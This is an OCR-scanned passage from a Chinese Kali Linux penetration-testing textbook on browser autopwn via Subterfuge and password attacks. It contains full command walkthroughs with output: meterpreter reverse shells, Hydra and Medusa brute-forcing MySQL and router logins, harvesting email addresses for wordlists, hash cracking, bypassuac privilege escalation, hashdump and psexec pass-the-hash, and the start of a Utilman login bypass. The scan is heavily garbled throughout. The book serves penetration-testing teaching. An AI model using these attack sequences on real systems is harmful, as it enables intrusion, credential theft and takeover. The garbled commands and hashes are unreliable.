图 7.26 JM Metasploit 框架 图 7.27 加 载 渗透 攻击 模块 


(5) 从 该 界面 可 以 看 到 加 载 了 好 多 个 渗透 攻击 模块 ， 加 载 完 后 ， 将 显示 如 图 7.28 所 示 
的 界面 。 


3:8080/AqWhAYKYEF 


tarting handler for windows/meterpreter/reverse_tcp on port 3333 
itarting handler for generi ] on port 6666 
ed reverse handler on j 
ting the payload handle ler... 
ting handler for java: neterpret e tcp on port 7777? 
ted reverse handler on 192,168 : 
Starting the payload handler... 
Started reverse handler on 192,158,5,103:7777 
Starting the payload handler,. 


-一 Done, found 18 exploit modules 
Using URL? http://0,0,0,038080, 
Local IP: http: 182. 168 “6 .103: 


Server started, 


图 7.28 模块 加 载 完 后 


(6) 从 该 界面 可 以 看 到 有 一 条 Done,found 18 exploit modules 信息 ， - Subterfuge $k 
到 了 18 BSR. SENHER Kali 时 ， 将 会 使 用 其 中 的 一 个 模块 。 当 目标 主 
机 访问 Kali 上 的 Subterfuge 时 ， 将 会 目 动 后 动 大 量 的 渗透 攻击 到 目标 主机 的 浏览 器 上 。 此 
IN, Kali 系统 上 将 显示 如 图 7.29 所 示 的 界面 。 


r autopun - Handling 
autopun - Handling ‘/?sessid= jcmSzb2ZOIFdpbmRuds 


crosoft Windows :XP - S 


soft Window >" 


Sending J tomicReferenceArr 
erencearray - Generated jar to 
creferencearray - Sending Java AtomicReferenceArr 


creferencearray - Generated jar to drop (5507 but 


= ?_jmxbean - handling request for /9 
? jmxbean ~ handling request 
_jrel?_jmxbean - handling request for 
) tomic referencearray Sending Java 
( "nme abi litu 


图 7.29 访问 攻击 主机 
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(7 以 上 显示 的 信息 表示 目标 主机 192.168.6.113 访问 了 攻击 主机 的 Subterfuge. JIN 


WOAH IANA, WA 7.30 所 示 。 


Information 


26FSIN Mes t @ AA-SS60KINZ6FS 


msf auxiliary 


图 7.30 ”打开 的 会 话 


(8) 从 该 界面 可 以 看 到 ， 成 功 的 打开 了 三 个 会 话 。 现 在 可 以 局 动 任何 一 


开 目 标 系统 的 Shell， 如 图 7.31 所 示 。 


msf auxiliary' j 
Star ting interaction wit e+e 


meterpreter > shell 
F 


awn shell with thread impersonation, Retrying without it, 


Mic s iP [05 5.1.2500] 
(C) 00008 1985-2001 Microsoft Corp, 


C:\Documents and Settings\Test \0@>§j 


图 7.31 Shell 窗口 


(9) 从 该 界面 可 以 看 到 成 功 连接 到 了 一 个 远程 会 话 。 
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密码 攻击 束 是 在 不 知道 密 钥 的 情况 下 ， 恢 复出 密码 明文 。 密 人 码 攻击 是 所 有 渗透 测试 的 
一 个 重要 部 分 。 如 果 作 为 一 个 渗透 测试 人 员 ， 不 了 解密 码 和 密码 破解 ， 人 简直 无 法 想象 。 所 
以 无 论 做 什么 或 我 们 的 技术 能 力 到 了 什么 程度 ， 密 码 似 乎 仍然 是 保护 数据 和 限制 系统 访问 
权限 的 最 第 用 方法 。 本 章 将 介绍 各 种 密码 攻击 方法 ， 如 密码 在 线 攻 击 、 路 由 占 密 人 码 攻击 和 
创建 密码 字典 等 。 


8.1 密码 在 线 破解 


为 了 使 用 户 能 成 功 登 录 到 目标 系统 ， 所 以 需要 获取 一 个 正确 的 密码 。 在 Kali 中 ， 在 线 
破解 密码 的 工具 很 多 ， E NUR doe PU Madam, 3CIRAHRMR Rode 
和 Medusa 工具 实现 密码 在 线 破 解 。 


8.1.1 Hydra 工具 


Hydra 是 一 个 相当 强大 的 暴力 密码 破解 工具 。 该 工具 支持 几乎 所 有 协议 的 在 线 密码 破 
fz, Wl FTP, HTTP. HTTPS. MySQL. MS SQL, Oracle, Cisco. IMAP 和 VNC 等。 其 
at Be Ta BLUE. BEET FE A RK. [RJ unm Hydra 比较 熟悉 ， 因 为 该 
工具 有 图 形 界 面 ， 且 操作 十 分 简单 ， 基 本 上 可 以 “傻瓜 ”操作 。 下 面 将 介绍 使 用 Hydra T. 
上 其 破解 在 线 密 人 友 。 

使 用 Hydra 工具 破解 在 线 密码 。 具 体操 作 步 又 如 下 所 示 。 

(1) 启动 Hydra 攻击 。 在 Kali RMKK “MHF” [Kali Linux|“ 密 码 攻击 ”| 
“在 线 攻击 ”|hydra-gtk 命令 ， 将 显示 如 图 8.1 所 示 的 界面 。 

(2) 该 界面 用 于 设置 目标 系统 的 地 址 、 端 口 和 协议 等 。 如 果 要 查看 密码 攻击 的 过 程 ， 
将 Output Options 杠 中 的 Show Attempts E 。 在 该 界面 单 击 Passwords 选项 卡 ， 将 
显示 如 图 8.2 PANE FPA 

G) 在 该 界面 指定 用 户 名 和 密码 列表 文件 。 本 例 中 使 用 Kali 系统 中 存在 的 用 记名 和 密 
公 列 表 文 件 ， 并 选择 Loop around users 选项 。 其 中 ， 用 户 名 和 密码 文件 分 别 保 存在 
/usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/names/nameslist.txt 和 /usr/share/wfuzz/ 
wordlist/fuzzdb/wordlists-user-passwd/passwds/john.txt 中 。 

(4) 设 痢 好 密码 字典 后 ， 单 击 Tuning 选项 卡 ， 将 显示 如 图 8.3 所 示 的 界面 。 

C5) 在 该 界面 设置 任务 的 编号 和 超时 时 间 。 如 果 运 行 任务 太 多 的 话 ， 服 务 的 响应 速率 
将 下 降 。 所 以 要 建议 将 原来 默认 的 任务 编号 16 修改 为 2， 超 时 时 间 修 改 为 15。 然 后 将 Exit 
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after first found pair 的 复 选 框 义 上 上， 表示 找到 第 一 对 匹配 项 时 则 停止 攻击 。 


ane 


@ Single Target 192.168.41.142 O Username 
O Target List C | eec 


Loop around users 
口 Prefer IPV6 


Protocol (€ Password List sswd/passwds/john.txt 


utput Options Colon separated file 


O Use SSL 口 Be Verbose 口 Use Colon separated file [ | 


m Tey ahy naword 
hydra -V -Le -P /usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-pass... - hydra -L /usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/nam... 
81 ”启动 界面 图 8.2 ”指定 密码 字典 
(6) 以 上 的 配置 都 设置 完 后 ， 单 击 到 Start 选项 卡 进 行 攻击 ， 如 图 8.4 所 示 。 
xHydra EHE 


Performance Options 


Number of Tasks 


Exit after first found pair 


se a HTTP/HTTPS Prox 


@ No Proxy O HTTP Method O CONNECT Method 


Proxy http://127.0.0.1:8080 


口 Proxy needs authentication 


hydra -L c -P /usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd... . hydra -V -L /usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/...  . 


图 8.3 基本 设置 图 8.4 攻击 界面 


(7) 在 该 界面 显示 了 四 个 按钮 ， 分 别 是 启动 、 停 止 、 保 存 输出 和 清除 输出 。 这 里 单 击 
Start 氛 钮 开始 攻击 ， 攻 击 过 程 如 图 8.5 所 示 。 
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xHydra last mts 
退出 (Q) 


Target Passwords “Tuning Specific | Start 


"Output 
Hydra v7.6 (c)2013 by van Hauser/TH C & David Maciejak - for legal purposes only 


Hydra (http://www.thc.org/thc-hydra) starting at 2014-05-08 17:19:09 

[DATA] 2 tasks, 1 server, 5926956 Login tries (L:1907/p:3108), - 2963478 tries per task 
[DATA] attacking service mysql on port 3306 

[ATTEMPT] target 192.168.41.142 - login "0" - pass "" - 1 of 5926956 [child 0] 
[ATTEMPT] target 192.158.41.142 - login "0" - pass "12345" - 2 of 5926950 [child 1] 
[ATTEMPT] target 192.168.41.142 - login “root” - pass "12345" - 2 of 5931972 [child 1] 
[ATTEMPT] target 192.168.41.142 - login "root" - pass "abc123" - 3 of 5931972 [child 1] 


[3306][mysql] host: 192.168.41.142 login: root password: 
«finished» 


hydra -V -L /usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/names/namelist.txt -... 


图 8.5 攻击 过 程 


(8) xHydra 工具 根据 自 定 的 用 户 名 和 密码 文件 中 的 条 日， 进行 匹配 。 当 找到 匹配 的 用 


户 名 和 密码 时 ， 则 停止 攻击 ， 如 图 8.5 所 示 。 


8.1.2 Medusa 工具 


Medusa 工具 是 通过 并 行 登 录 炊 力 人 破解 的 方法 ， 尝 试 获 取 远 程 验证 服务 访问 权限 。 


Medusa 能 够 验证 的 远程 服务 ， 如 AFP, FTP, HTTP, IMAP, MS SQL, NetWare, NNTP, 
PcAnyWhere, POP3, REXEC, RLOGIN. SMTPAUTH, SNMP, SSHv2, Telnet, VNC 
和 Web Form 等 。 下 面 将 介绍 使 用 Medusa TALS UPR EH AS I [a AL 


HB 


启动 Medusa LH. Æ% im ÉBzisí1] medusa 命令 ， 如 下 所 示 : 


root@kali:~# medusa 


a TE SIM ERE FE “OV Fee” [Kali Linux|“ 密码 攻 击 ”|“ 在 线 攻 击 ”|medusa 


命令 ， 将 输出 如 下 所 示 的 信息 : 


Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net> 
medusa: option requires an argument -- 'h' 

CRITICAL: Unknown error processing command-line options. 

ALERT: Host information must be supplied. 

Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module 


[OPT] 
-h [TEXT]  : Target hostname or IP address 
-H [FILE] : File containing target hostnames or IP addresses 
-u [TEXT] |: Username to test 
-U [FILE] : File containing usernames to test 
-p [TEXT]  : Password to test 
-P [FILE] : File containing passwords to test 
-C [FILE] : File containing combo entries. See README for more information. 


-O [FILE] : File to append log information to 
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-e.[n/s/ns] :Additional password checks ([n] No Password, [s] Password = Username) 

-M [TEXT] : Name of the module to execute (without the .mod extension) 

-m [TEXT] : Parameter to pass to the module. This can be passed multiple times with a 
different parameter each time and they will all be sent to the module (i.e. 
-m Param1 -m Param2, etc.) 


-d : Dump all known modules 

-n [NUM] : Use for non-default TCP port number 

-S : Enable SSL 

-g [NUM] : Give up after trying to connect for NUM seconds (default 3) 

-r [NUM] : Sleep NUM seconds between retry attempts (default 3) 

-R [NUM] : Attempt NUM retries before giving up. The total number of attempts will be 
NUM + 1. 

-t [NUM] : Total number of logins to be tested concurrently 

-T [NUM] : Total number of hosts to be tested concurrently 

-L : Parallelize logins using one username per thread. The default is to process 

the entire username before proceeding. 

-f : Stop scanning host after first valid username/password found. 

-F : Stop audit after first valid username/password found on any host. 

-b : Suppress startup banner 

-q : Display module's usage information 

-v [NUM] : Verbose level [0 - 6 (more)] 

-w [NUM] : Error debug level [0 - 10 (more)] 

-V : Display version 

-Z [TEXT] : Resume scan based on map of previous scan 


以 上 输出 的 信息 显示 了 了 medusa 命令 的 帮助 信息 。 包 括 meduas 命令 的 语法 、 可 使 用 的 
选项 及 参数 。 用 尸 可 以 根据 目 己 的 需要 ， 选 择 相 应 的 选项 获取 路 由 需 的 访问 权 。 下 面 看 一 
个 例子 的 运行 结果 。 

【实例 8-1】 使 用 medusa 2877 WEEE AY 192.168.5.1 ee Hae, SAT Gp m ul P Hr: 


root@kali:~# medusa -h 192.168.5.1 -u admin -P /usr/share/wfuzz/wordlist/fuzzdb/wordlists-user- 
passwd/passwds/john.txt -M http -e ns 80 -F 

Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net> 
ACCOUNT CHECK: [http] Host: 192.168.5.1 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) 
Password: (1 of 3109 complete) 

ACCOUNT CHECK: [http] Host: 192.168.5.1 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) 
Password: admin (2 of 3109 complete) 

ACCOUNT CHECK: [http] Host: 192.168.5.1 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) 
Password: 12345 (3 of 3109 complete) 

ACCOUNT CHECK: [http] Host: 192.168.5.1 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) 
Password: abc123 (4 of 3109 complete) 

ACCOUNT CHECK: [http] Host: 192.168.5.1 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) 
Password: password (5 of 3109 complete) 

ACCOUNT CHECK: [http] Host: 192.168.5.1 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) 
Password: computer (6 of 3109 complete) 

ACCOUNT CHECK: [http] Host: 192.168.5.1 (1 of 1, 0 complete) User: admin (1 of 1, O complete) 
Password: 123456 (7 of 3109 complete) 

ACCOUNT CHECK: [http] Host: 192.168.5.1 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) 
Password: huolong5 (8 of 3109 complete) 

ACCOUNT FOUND: [http] Host: 192.168.5.1 User: admin Password: daxueba [SUCCESS] 


以 上 输出 的 信息 是 破解 路 由 器 密码 的 一 个 过 程 。 一 般 路 由 器 默认 的 用 户 名 和 密码 都 是 
admin。 但 是 通常 ， 用 户 会 将 密码 进行 修改 。 所 以 这 里 指定 一 个 密码 字典 john.txt， 通 过 该 
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字典 对 路 由 器 进行 暴力 破解 。 从 最 后 一 行 输出 的 信息 ， 可 以 看 到 路 由 喜 的 用 户 名 和 蜜 但 分 
W admin 和 daxueba。 
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在 实现 密码 破解 之 前 ， 介 绍 一 下 如 何 分 析 密 码 。 分 析 密 人 码 的 目的 是 ,通过 从 目标 系统 、 
组 织 中 收集 信息 来 获得 一 个 较 小 的 密 人 码 字 典 。 本 节 将 介绍 使 用 Ettercap 工具 或 
MSFCONSOLE 来 分 析 密 码 。 


8.2.1 Ettercap 工具 


Ettercap 是 Linux 下 一 个 强大 的 欺骗 工具 ， 也 适用 于 Windows。 用 户 能 够 使 用 Ettercap 
工具 快速 地 创建 伪造 的 包 ， 实 现 从 网 络 适 配 右 到 应 用 软件 各 种 级 别 的 包 ， 绑 定 监 听 数 据 到 
一 个 本 地 疹 口 等 。 下 面 将 介绍 Ettercap 工具 的 使 用 。 

使 用 Ettercap 分 析 密 码 的 具体 操作 步骤 如 下 所 示 。 

(1) 配置 Ettercap 的 配置 文件 etter.conf。 首 先 使 用 locate 命令 得 找到 Ettercap 配置 文 
件 保 存 的 位 置 。 执 行 命 令 如 下 所 示 : 

root@kali:~# locate etter.conf 


/etc/ettercap/etter.conf 
/usr/share/man/man5/etter.conf.5.gz 


从 以 上 输出 信息 中 ， 可 以 看 到 Ettercap 配置 文件 etter.conf 保存 在 /etc/ettercap/ 中 。 
(2) 使 用 VIM 编辑 etter.conf 配置 文件 。 将 该 文件 中 ec uid 和 ec_gid 配置 项 值 修改 为 
0， 并 将 Linux 部 分 附近 IPTABLES 行 的 注释 去 掉 。 修 改 结果 如 下 所 示 : 


root@kali:~# vi /etc/ettercap/etter.conf 

[privs] 

ec uid = 0 # nobody is the default 
ec gid = 0 # nobody is the default 


# if you use iptables: 

redir command on = “iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -| 
REDIRECT --to-port %rport" 

redir command off = “iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j 
REDIRECT --to-port %rport" 


(3) JAB) Ettercap. [EH] Ettercap 命令 的 -G 选项 ， 局 动 图 形 界面 。 执 行 命令 如 下 所 示 : 
root@kali:~# ettercap -G 


执行 以 上 命令 后 ， 将 显示 如 图 8.6 所 示 的 界面 。 
(4) 通过 使 用 中 间 人 攻击 的 方式 ， 收 集 目 标 系统 上 的 各 种 重要 信息 。 通 过 这 些 信息 来 
构建 可 能 的 密码 字典 。 关 于 使 用 Ettercap 实现 中 间 人 攻击 ， 在 第 7 章 已 详细 介绍 ， 这 里 不 
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ettercap 0.8.0 


File Sniff Options ? 


图 8.6 Ettercap 初始 界面 


8.2.2 使 用 MSFCONSOLE 分 析 密 码 


使 用 Metasploit MSFCONSOLE 的 search email collector 模块 分 析 密 码 。 通 过 该 模块 可 
以 搜集 一 个 组 织 相 关 的 各 种 邮件 信息 。 这 些 邮件 信息 有 助 于 构建 用 户 字 典 。 有 具体 操作 步骤 
如 下 所 示 。 

(1) 使 用 MSFCONSOLE。 执 行 命令 如 下 所 示 : 


root@kali:~# msfconsole 
msf > 


(2) 查询 search email collector 模块 。 执 行 命令 如 下 所 示 : 


msf > search email collector 
山 Database not connected or cache not built, using slow search 
Matching Modules 


Name Disclosure Date Rank Description 


auxiliary/gather/search_email_collector normal Search Engine Domain Email Address Collector 
msf > 


执行 以 上 命令 后 ， 在 输出 结果 中 看 到 以 上 信息 ， 束 表示 存在 search email collector 
模块 。 
(3) 使 用 辅助 模块 search_email_collector。 执 行 命令 如 下 所 示 : 


msf > use auxiliary/gather/search_email_collector 
msf auxiliary(search email collector) > 


输出 的 信息 表示 ， 已 切换 到 search email collector 模块 。 
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(4) ft search email collector 模块 下 有 效 的 选项 。 执 行 命令 如 下 所 示 : 


msf auxiliary(search_email_collector) > show options 
Module options (auxiliary/gather/search_email_collector): 


Name Current Setting Required Description 

DOMAIN yes The domain name to locate email addresses for 
OUTFILE no A filename to store the generated email list 
SEARCH_BING true yes Enable Bing as a backend search engine 
SEARCH GOOGLE true yes Enable Google as a backend search engine 
SEARCH YAHOO true yes Enable Yahoo! as a backend search engine 


输出 的 信息 显示 了 search email collector 模块 中 有 效 的 配置 选项 ， 根 据 用 户 目 己 的 情 
况 配 置 相应 的 选项 。 
(5) 下 面 分 别 配 置 DOMAIN 和 OUTFILE 选项 ， 如 下 所 示 : 


msf auxiliary(search_email_collector) > set DOMAIN gmail.com 

domain => gmail.com 

msf auxiliary(search_email_collector) > set outfile /root/Desktop/fromwillie.txt 
outfile => /root/Desktop/fromwillie.txt 


(6) 启动 渗透 攻击 。 执 行 命令 如 下 所 示 : 


msf auxiliary(search_email_collector) > run 
[*] Harvesting emails ..... 


[*] Searching Google for email addresses from gmail.com 
[*] Extracting emails from Google search results... 

[*] Searching Bing email addresses from gmail.com 

[*] Extracting emails from Bing search results... 

[*] Searching Yahoo for email addresses from gmail.com 
[*] rasvin.247@gmail.com 

[*] read.jeff@gmail.com 

[*] restore.adore@gmail.com 

[x] rhetoricguy@gmail.com 

[*] sammy@gmail.com 

[*] signaturetitleservices@gmail.com 

[*] smplustb@gmail.com 

[*] starfyi@gmail.com 

[*] taylorhansson@gmail.com 

[*] thanhtam.hr@gmail.com 

[x] theidleague@gmail.com 

[*]  tjarkse@gmail.com 

[*] toni@gmail.com 

[*] user@gmail.com 

[*] vintageheadboards@gmail.com 

[*] vlyubish270@gmail.com 

[*] webuyrarebooks@gmail.com 

[x] yavmamemogames@gmail.com 

[*] yoyonorfcack@gmail.com 

[*] Writing email address list to /root/Desktop/fromwillie.txt... 
[*] Auxiliary module execution completed 


输出 的 信息 显示 了 所 有 gmail.cm 的 邮箱 地 址 ， 并 且 将 所 有 信息 保存 在 fromwillie.txt 
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多 件 中 ~ 此 时 用 户 可 以 根据 收集 到 的 邮箱 用 户 信 息 ， 猜 测 它 的 密 人 码 。 
8.2.3 哈 希 值 识别 工具 Hash Identifier 


哈 希 值 是 使 用 HASH 算法 通过 逻辑 运算 得 到 的 数值 .不 同 的 内 容 使 用 HASH 算法 运算 
后 ， 得 到 的 哈 希 值 不 同 。 下 面 将 介绍 使 用 Hash Identifier 工具 识别 哈 希 值 的 加 密 方式 。 

(1) 启动 hash-identifier 命令 。 在 图 形 界 面 依次 选择 “应 用 程序 ”区 ali Linux| “27442 
击 ”|“ 离 线 攻击 ”|hash-identifier 命令 ， 将 显示 如 下 所 示 的 信息 : 


SMES SSS SSS SSS SSS SSS SSS SSS CSOSA S SSS SOS SSO I I I ITIIIITITIT 


# | = 

8 ANN AN EE C = 

#\\\ \\ ul mE ee V AV. \\W\ # 

s EE E d E CLTC \\\ \\\\\ ae 
NY \\\\\\ We ey = 

# \\\\\\ \W_/ \\\\\ /\ NN / = 
# VNN NN / VN/ V EM i E 
# By Zion3R # 

= www.Blackploit.com # 

= Root@Blackploit.com # 


从 输出 的 信息 中 看 到 HASH: 提 示 符 ， 就 表示 成 功 打 开 f hash-identifier 命令 的 终端 。 
此 时 ， 攻 击 时 就 有 LM 加 密 的 哈 希 值 。 

(2) 攻击 6bcec2ba2597f089189735afeaa300d4 哈 希 值 。 执 行 命令 如 下 所 示 : 

HASH: 6bcec2ba2597f089189735afeaa300d4 

Possible Hashs: 

[+] MD5 

[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username))) 

Least Possible Hashs: 

[+] RAdmin v2.x 

[+] NTLM 

[+] MD4 

[+] MD2 

[+] MD5(HMAC) 

[+] MD4(HMAC) 


从 输出 的 信息 中 ， 可 以 看 到 6bcec2ba2597£089189735afeaa300d4 哈 希 值 可 能 是 使 用 
MDS 加 密 的 。 


8.3 #&f% LM Hashes #74 


LM (LAN Manager) Hash 是 Windows 操作 系统 最 早 使 用 的 密码 哈 希 算法 之 一 。 在 
Windows 2000, XP. Vista 和 Windows 7 中 使 用 了 更 先进 的 NTLMv2 之 前 ， 这 是 唯一 可 用 
的 版 本 。 这 些 新 的 操作 系统 虽然 可 以 文 持 使 用 LM 哈 希 ,但 主要 是 为 了 提供 问 后 兼容 性 。 
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不 过 在 Windows Vista 和 Windows 7 中 , 该 算法 默认 是 被 禁用 的 。 本 节 将 介绍 如 何 破解 LM 
Hashes 41, 

在 Kali Linux 中 ， 可 以 使 用 findmyhash 工具 破解 LM Hashes #444. HF, findmyhash 
命令 的 语法 格式 如 下 所 示 : 


findmyhash <Encryption> -h hash 


以 上 语法 中 ， 各 个 选项 含义 如 下 所 示 。 
O Encryption: 指定 使 用 的 哈 希 加 密 类 型 。 
-h: 指定 要 破解 的 LM 哈 希 值 。 
【实例 8-2】 使 用 findmyhash 命令 攻击 LM Hashes 密码 。 执 行 命令 如 下 所 示 : 


root@kali:~# findmyhash MD5 -h 5f4dcc3b5aa/65d61d832/deb882cf99 
Cracking hash: 5f4dcc3b5aa/65d61d832/deb882cf99 
Analyzing with md5hood (http://mdShood.com )... 

... hash not found in mdShood 

Analyzing with stringfunction (http://www.stringfunction.com )... 
... hash not found in stringfunction 

Analyzing with 99k.org (http://xanadrel.99k.org)... 

... hash not found in 99k.org 

Analyzing with sans (http://isc.sans.edu)... 

... hash not found in sans 

Analyzing with bokehman (http://bokehman.com)... 

... hash not found in bokehman 

Analyzing with goog.li (http://goog.li)... 

... hash not found in goog.li 

Analyzing with schwett (http://schwett.com)... 

... hash not found in schwett 

Analyzing with netmd5crack (http://www.netmd5crack.com)... 
... hash not found in netmd5crack 

Analyzing with md5-cracker (http://www.md5-cracker.tk)... 

... hash not found in md5-cracker 

Analyzing with benramsey (http://tools.benramsey.com)... 

... hash not found in benramsey 

Analyzing with gromweb (http://md5.gromweb.com )... 

xc HASH CRACKED!II sexes 

The original string is: password 

The following hashes were cracked: 


5f4dcc3b5aa/65d61d832/deb882cf99 -> password 


以 上 输出 的 信息 是 攻击 LM Hashes #744 3 的 过 Vie. ABN Ba, Ba BG S B 
5f4dcc3b5aa765d61d8327deb882cf99 的 原始 密码 是 password. 

如 条 觉得 破解 LM Hashes 太 慢 的 话 ， 可 以 使 用 Metasploit 中 的 psexec 模块 绕 过 Hash 
值 。 下 面 将 介绍 使 用 psexec 模块 绕 过 Hash 值 的 方法 。 

(1) 通过 在 目标 主机 〈Windows 7) 上 运行 Veil 创建 的 可 执行 文件 backup.exe， 成 功 


获取 一 个 活跃 的 远程 会 话 ， 如 下 所 示 : 
[*] Started reverse handler on 192.168.6.103:4444 
[*] Starting the payload handler... 
[*] Sending stage (769536 bytes) to 192.168.6.106 
[*] Meterpreter session 1 opened (192.168.6.103:4444 -> 192.168.6.106:49160) at 2014-07-22 
15:29:55 +0800 


从 以 上 信息 中 ， 可 以 看 到 成 功 打 开 了 会 话 1。 
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(2 六 合 看 用 户 权 限 信 息 。 执 行 命令 如 下 所 示 : 


meterpreter > getuid 
Server username: WIN-RKPKQFBLG6C\lyw 


从 输出 的 信息 中 ， 可 以 看 到 该 用 户 的 权限 是 一 个 普通 权限 。 接 下 来 ， 使 用 bypassuac 
PERG I UAC. 
(3) 设置 lyw 用 户 绕 过 UAC。 执 行 命令 如 下 所 示 : 


meterpreter > background 

[*] Backgrounding session 1... 

msf exploit(handler) > use exploit/windows/local/bypassuac 
msf exploit(bypassuac) > set session 1 

session => 1 

msf exploit(bypassuac) > exploit 

[*] Started reverse handler on 192.168.6.103:4444 

[*] UAC is Enabled, checking level... 

[+] UAC is set to Default 

[+] BypassUAC can bypass this setting, continuing... 

[+] Part of Administrators group! Continuing... 

[*] Uploaded the agent to the filesystem.... 

[*] Uploading the bypass UAC executable to the filesystem... 
[*] Meterpreter stager executable 73802 bytes long being uploaded.. 
[*] Sending stage (769536 bytes) to 192.168.6.106 

[*] Meterpreter session 3 opened (192.168.6.103:4444 -> 192.168.6.106:49160) at 2014-07-22 
15:34:38 +0800 

meterpreter > getsystem 

...got system (via technique 1). 

meterpreter > getuid 

Server username: NT AUTHORITY\SYSTEM 


从 输出 的 信息 中 ， 可 以 看 到 此 时 lyw HIP BUR AR SYSTEM. 
(4) 合 看 目标 主机 上 所 有 用 户 的 哈 布 密码 值 。 执 行 命令 如 下 所 示 : 


meterpreter > run post/windows/gather/hashdump 

[*] Obtaining the boot key... 

[*] Calculating the hboot key using SYSKEY 45fa5958a01cf2b66b/3daa1/4b19dae... 

[*] Obtaining the user list and keys... 

[*] Decrypting user keys... 

[*] Dumping password hints... 

Test:"123" 

[*] Dumping password hashes... 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c 
0: 

Guest:501:aad3b435b51404eeaad3b435b514046ee:31d6cfe0d16ae931b/3c59d/e0c089c0::: 
Test:1001:aad3b435b51404eeaad3b435b51404ee:32ed8 / bdb5fdc5e9cba8854737681844::: 
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:daf26fce5b476e01aaeO0f919f529 
926e3::: 
lyw:1003:aad3b435b51404eeaad3b435b514046ee:32ed8/bdb5fdc5e9cba8854737681844::: 
alice: 1004:aad3b435b51404eeaad3b435b51404ee:223 15d6ed1a/d5f8a/c98c40e9fa2dec::: 


从 输出 的 信息 中 , 可 以 看 到 捕获 到 六 个 用 户 的 哈 希 密码 值 。 此 时 , 可 以 使 用 SMB psexec 
模块 绕 过 Hash 值 。 
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(35 六 后 台 运 行 会 话 2。 执 行 命令 如 下 所 示 : 


meterpreter > background 
[*] Backgrounding session 2... 


(6) 使 用 SMB psexec 模块 ， 并 设置 需要 的 配置 选项 参数 。 执 行 命令 如 下 所 示 : 


msf exploit(bypassuac) > use exploit/windows/smb/psexec 


msf exploit(psexec) > set RHOST 192.168.6.114 # 设 置 远 程 主机 地 址 
RHOST => 192.168.6.114 
msf exploit(psexec) > set SMBUser Test # 设 置 SMB HA 


SMBUser => alice 

msf exploit(psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee: 
22315d6ed1a/d5f8a/c98c40e9fa2dec # 设 置 SMB 密码 

SMBPass => aad3b435b51404eeaad3b435b51404ee:223 1 5d6ed1a/d5f8a/c98c40e9fa2dec 


(7) 局 动 攻 击 。 执 行 命令 如 下 所 示 : 


msf exploit(psexec) > exploit 
[*] Started reverse handler on 192.168.6.103:4444 


[*] Connecting to the server... 

[*] Authenticating to 192.168.6.114:445|WORKGROUP as user ‘lyw’... 

[*] Uploading payload... 

[*] Created \XBotpcOY.exe... 

[*] Deleting \XBotpcOY.exe... 

[*] Sending stage (769536 bytes) to 192.168.6.114 

[x] Meterpreter session 3 opened (192.168.6.103:4444 -> 192.168.6.114:49159) at 2014-07-22 
17:32:13 +0800 


从 输出 的 信息 中 ， 可 以 看 到 使 用 “Test” 用 户 成 功 的 打开 了 一 个 会 话 。 
8.44 绕 过 Utilman 登录 


Utilman 是 Windows 辅助 工具 管理 右 。 该 程序 是 存放 在 Windows 系统 文件 中 最 重要 的 
文件 ， 通 和 常情 况 下 是 在 安装 系统 过 程 中 目 动 创建 的 ， 对 于 系统 正常 运行 来 说 至 天 重要 。 在 
Windows 下 ， 使 用 Windows+U 组 合 键 可 以 调用 Utilman 进程 。 本 节 将 介绍 绕 过 Utilman FE 
序 登 录 系 统 ， 就 可 以 运行 其 他 操作 。 

(1) 在 Windows 界面 ， 朋 动 Kali Linux LiveCD, Wl 8.7 所 示 。 

(2) 在 该 界面 选择 Live (686-pae) ， 按 下 回 车 键 即 可 启动 Kali Linux, WW] 8.8 所 示 。 


Applications Places & Sat Jul 19, 5:17 PM 


Home Folder 


mv BH Desktop 
-— 


* 
& Floppy Drive 
Boot menu 
ue 


CA 43 GB Filesystem 
13 GB File: Ta Network 


Connect to Server... 


图 8.7 Kali Linux 引导 界面 图 8.8 Kali Linux 操作 系统 
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(3 六 在 该 界面 打开 Windows 文件 系统 。 在 Kali Linux 桌面 依次 选择 Places|43GB 
Filesystem 选项 ， 将 打开 如 图 8.9 所 示 的 界面 。 这 里 的 43G 表示 当前 Windows 系统 的 磁盘 
大 小 。 


2454E29854E26CAC 
File Edit View Go Bookmarks Help 
Devices 


O 系统 保留 


ProgramData Program Files 
B 12068.. 2 


1 € 43 GB Filesystem 


GMDownload 
Computer 


a Home 


SRecycle.Bin System Volume 
Desktop 


Information 
(d File System 


anes i — ms 


win3 2-loader Windows 
Network 


Windows XP 专业 版 autoexec.bat config.sys 


Lr] Rrowse Net... 


图 8.9 Windows 磁盘 中 的 文件 和 文件 夹 
CA) 该 界面 显示 了 


Windows 操作 系统 中 的 文件 和 文件 夹 。 这 里 依次 打开 
Windows|System32 文件 夹 ， 将 显示 如 图 8.10 所 示 的 内 容 。 


System32 Boa 
File Edit View Go Bookmarks Help 
Devices < © 43 GB Filesystem Windows Systems2 € 9 Q Search 
J 系统 保留 usercpl.dll userenv.dll userinit.exe 
图 120 GB ..， 全 Ese | 
Computer H ba H 
Ea Home usk.rs usp10.dll utildll.dll 
fll Desktop | $) | d ?| 
国 File System = 
i uxtheme.dll 
Trash Utilman.exe uudf. dll 
Network | | =) d 
1 f 1 
Browse Net... UX Init. dil uxlib.dll uxlibres.dll | 
bd 1 E 
Uxsmsdll — — — — uxthem 


